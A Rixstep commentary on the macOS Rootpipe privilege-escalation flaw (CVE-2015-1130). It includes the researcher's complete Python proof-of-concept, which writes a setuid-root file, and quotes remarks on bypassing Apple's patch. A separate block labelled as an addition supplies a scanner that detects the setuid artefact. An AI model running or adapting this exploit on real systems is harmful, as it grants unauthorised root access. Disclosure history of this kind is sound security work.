Rixstep

Smokin' Rootpipe

Sometimes the smell lingers on.



CUPERTINO (Rixstep) — On 2 October 2014, Swedish security researcher Emil Kvarnhammar made a startling discovery. It was reported in the evening tabloid Aftonbladet a mere eight days later.



Emil had discovered a privilege escalation 'hack' - he called it a backdoor.

The 'MO' of what he discovered was straightforward: there was an XPC service that allowed privilege escalation - even from a non-admin account - through a method used to create files.

He called his hack 'Rootpipe'. The source code for his PoC follows.

########################################################
#
#  PoC exploit code for rootpipe (CVE-2015-1130)
#
#  Created by Emil Kvarnhammar, TrueSec
#
#  Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2
#
########################################################
import os
import sys
import platform
import re
import ctypes
import objc
import sys
from Cocoa import NSData, NSMutableDictionary, NSFilePosixPermissions
from Foundation import NSAutoreleasePool

def load_lib(append_path):
    return ctypes.cdll.LoadLibrary("/System/Library/PrivateFrameworks/" + append_path);

def use_old_api():
    return re.match("^(10.7|10.8)(.\d)?$", platform.mac_ver()[0])

args = sys.argv

if len(args) != 3:
    print "usage: exploit.py source_binary dest_binary_as_root"
    sys.exit(-1)

source_binary = args[1]
dest_binary = os.path.realpath(args[2])

if not os.path.exists(source_binary):
    raise Exception("file does not exist!")

pool = NSAutoreleasePool.alloc().init()

attr = NSMutableDictionary.alloc().init()
attr.setValue_forKey_(04777, NSFilePosixPermissions)
data = NSData.alloc().initWithContentsOfFile_(source_binary)

print "will write file", dest_binary

if use_old_api():
    adm_lib = load_lib("/Admin.framework/Admin")
    Authenticator = objc.lookUpClass("Authenticator")
    ToolLiaison = objc.lookUpClass("ToolLiaison")
    SFAuthorization = objc.lookUpClass("SFAuthorization")

    authent = Authenticator.sharedAuthenticator()
    authref = SFAuthorization.authorization()

    # authref with value nil is not accepted on OS X <= 10.8
    authent.authenticateUsingAuthorizationSync_(authref)
    st = ToolLiaison.sharedToolLiaison()
    tool = st.tool()
    tool.createFileWithContents_path_attributes_(data, dest_binary, attr)
else:
    adm_lib = load_lib("/SystemAdministration.framework/SystemAdministration")
    WriteConfigClient = objc.lookUpClass("WriteConfigClient")
    client = WriteConfigClient.sharedClient()
    client.authenticateUsingAuthorizationSync_(None)
    tool = client.remoteProxy()

    tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)

print "Done!"

del pool

What's Going On?

What's going on? The code sees to it that a SUID binary (04777) is created. (SUID scripts can be disabled at boot.) All one needs after that is enough code in the binary to open a root shell. Two lines of code, tops. A discovery made later was that by passing a nil value for authref on 10.9 or later, it can be made to work as well - even from non-admin accounts.

# authref with value nil is not accepted on OS X <= 10.8

The entire process can more or less be automated. By anyone anywhere.
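The artifact this leaves behind is easy to look for. The following is an added example, not part of the original article or of Kvarnhammar's PoC: a scanner that flags root-owned setuid files that are also writable by group or others, which is what the 04777 mode above produces. The function names, the ratings 'alert' and 'review', and the owner_uid parameter (there so the check can be tried without root) are assumptions of this example.

```python
import os
import stat

def classify(mode, uid, owner_uid=0):
    """Rate one file's lstat data. owner_uid is 0 (root) on a real scan."""
    if not stat.S_ISREG(mode) or not mode & stat.S_ISUID or uid != owner_uid:
        return None
    # Legitimate setuid-root tools are writable by their owner only.
    # The PoC asks for 04777: setuid plus write access for group and others.
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        return "alert"
    return "review"

def scan(root, owner_uid=0, include_review=False):
    """Walk root without following symlinks; return (path, octal mode, rating)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda err: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # file vanished or is unreadable
            rating = classify(st.st_mode, st.st_uid, owner_uid)
            if rating == "alert" or (rating and include_review):
                hits.append((path, "%05o" % stat.S_IMODE(st.st_mode), rating))
    return sorted(hits)

if __name__ == "__main__":
    import sys
    start = sys.argv[1] if len(sys.argv) > 1 else "/"
    for path, mode, rating in scan(start, include_review=True):
        print(rating, mode, path)
```

Entries rated 'review' are ordinary setuid-root files; compare them against a known-good baseline for the OS release rather than treating each one as a finding.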

The Hunt After October

Emil contacted Apple the very day after his discovery, and his company (TrueSec) and Apple came to an agreement to keep silent about it all.

Rootpipe is a bit of déjà vu all over again, especially for those who've seen Opener and that curious propensity, starting with Safari 4.0.5, to install without authentication. There wasn't much of a murmur back then, and there's certainly not much of a murmur now: sporadic comments on social media ask demurely if Rootpipe will ever be fixed; further comments ask why the MSM are keeping so silent about it, now that the initial tempest in the teapot's been covered to their satisfaction.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>InstallAtLogout</key>
    <array>
        <string>061-7784</string>
    </array>
    <key>ProductPaths</key>
    <dict>
        <key>061-7784</key>
        <string>061-7784</string>
    </dict>
</dict>
</plist>

You can't place files in /Library/Updates without root privileges - you can't place anything in /var/db either - yet from one version of OS X to the next, where previously you of course needed to authenticate, you suddenly didn't need to authenticate at all. Meaning there's been a 'cheat' in OS X since at least March 2010 - and considering Opener, a lot longer.

What the heck were they thinking?

There are those who claim the Rootpipe hole has finally been plugged, but there seems to be no corroboration at this point. Another researcher claims that the hole can still be exploited - even after the 10.10.3 update.

Yeap their fix doesn't fix anything and that was clear the moment they only use entitlements as a fix.

The trick here is to exploit any of the authorized binaries to run code. DYLD_ will not work because dyld will always clear it on these binaries.

Using task_for_pid will trigger the password prompt which isn't silent and for that there's no need to use rootpipe for anything.

More Than Elegance

There's elegance in simplicity, said the Bell Labs gurus. But there's more than elegance - there's also maintainability and robustness. The legacy handed to NeXT and Apple with FreeBSD was considerable; not only is it way too much work to continually revise FreeBSD code that comes in, it's also imprudent: open source code can have been tested by hundreds, thousands, tens of thousands; OpenBSD even had a dedicated bug-hunter special staff; but playing with security by dreaming up doodads and new features that cannot have been adequately tested - that's just nuts.

Apple have been hit time and again - not through weaknesses in the 'rock solid foundation', but through the full retard ideas they've had about adding feature sets to that foundation.

Maybe it's time they stopped. Maybe it's time Sir Tim and his immediate staff - who most likely have no clue what's really going on - take a closer look themselves. The company with the biggest market cap in the world - with an unbelievable product lineup today - can make sure the 'Scott Forstall discards' don't undermine the corporation's interests anymore.

Oct 2nd 2014: First discovery
Oct 3rd 2014: First contact with Apple Product Security Team
Oct 14th 2014: Exploit code shared with Apple
Oct 24th 2014: Initial full disclosure date set to Jan 12th 2015
Oct 16th 2014: Release of OS X 10.10 Yosemite, vulnerable to rootpipe
Nov 14th 2014: Apple requested to postpone disclosure
Nov 17th 2014: Release of OS X 10.10.1, also vulnerable
Jan 12th 2015: Joint decision between Apple and TrueSec to postpone disclosure due to the amount of changes required in OS X
Jan 16th 2015: CVE-2015-1130 created by Apple
Jan 27th 2015: Release of OS X 10.10.2, also vulnerable
March 2nd 2015: Release of OS X 10.10.3 public beta, issue solved
April 1st 2015: Apple confirmed that release is coming the second week of April
April 8th 2015: Release of OS X 10.10.3
April 9th 2015: Full disclosure

Details on the #rootpipe exploit will be presented, but not now. Let's just give Apple some time to roll out a patch to affected users.
 - Emil Kvarnhammar 16 October 2014

See Also
Rixstep: The Strange Case of Safari 4.0.5
Rixstep: .SoftwareUpdateAtLogout
Rixstep: AdminAuthorization
Rixstep: 'Without Explicit Authorization'

Aftonbladet: Ny säkerhetsbrist upptäckt i Apples operativsystem
Macworld UK: Swedish hacker finds 'serious' vulnerability in OS X Yosemite
ZD: Serious security flaw in OS X Yosemite 'Rootpipe'
The Register: OS X Yosemite infested by nasty 'Rootpipe' vuln
Guardian: Double trouble for Apple as two software security flaws discovered
TrueSec: Hidden backdoor API to root privileges in Apple OS X
CVE Details: CVE-2015-1130
Reverse: How to fix Rootpipe in Mavericks and call Apple's bullshit bluff
Objective-See: Phoenix: RootPipe lives! Even on OS X 10.10.3
Forbes: Failed Apple Rootpipe Fix Leaves Backdoor On All Macs
InfoWorld: OS X 'Rootpipe' patch flops, fails to fix flaw
Net Security: Apple fix didn't close Rootpipe backdoor
SC Magazine: 'Rootpipe' vulnerability still exploitable on patched machines
TrueSec: Rootpipe: OS X 10.10.3 still vulnerable
Reverse: The Empire Strikes Back Apple - How your Mac firmware security is completely broken
Ars: New exploit leaves most Macs vulnerable to permanent backdooring
Cult of Mac: Rootpipe Older Macs are vulnerable to dangerous new bug

Copyright © Rixstep. All rights reserved.